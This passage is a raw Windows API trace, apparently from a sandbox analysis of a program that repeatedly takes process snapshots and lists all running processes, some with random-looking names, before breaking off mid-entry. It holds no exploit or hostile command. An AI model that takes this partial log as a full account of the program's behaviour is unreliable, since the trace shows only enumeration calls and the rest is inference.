[0148.094] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.096] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.097] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0148.099] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0148.189] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0148.190] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.195] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0148.196] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0148.200] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0148.201] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0148.205] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0148.208] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0148.210] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0148.211] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0148.213] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0148.214] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0148.216] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0148.217] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0148.219] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0148.220] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0148.222] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0148.223] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0148.224] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0148.274] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0148.275] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0148.277] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0148.278] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.280] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0148.282] CloseHandle (hObject=0xc4) returned 1 [0148.282] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0148.291] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.292] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0148.293] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0148.296] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.297] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0148.298] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0148.299] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0148.299] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0148.300] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0148.301] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0148.302] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.303] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.304] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.305] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.309] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.310] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0148.311] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.312] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.313] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0148.314] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.316] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.317] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0148.318] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0148.320] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0148.335] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.336] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0148.338] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0148.339] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0148.341] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0148.342] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0148.343] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0148.345] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0148.346] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0148.348] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0148.349] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0148.351] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0148.352] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0148.353] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0148.355] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0148.356] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0148.357] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0148.359] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0148.360] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0148.361] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0148.363] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0148.364] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0148.372] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0148.373] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0148.375] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0148.376] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0148.377] CloseHandle (hObject=0xbc) returned 1 [0148.377] Sleep (dwMilliseconds=0x12c) [0148.687] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0148.693] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0148.694] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0148.695] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, 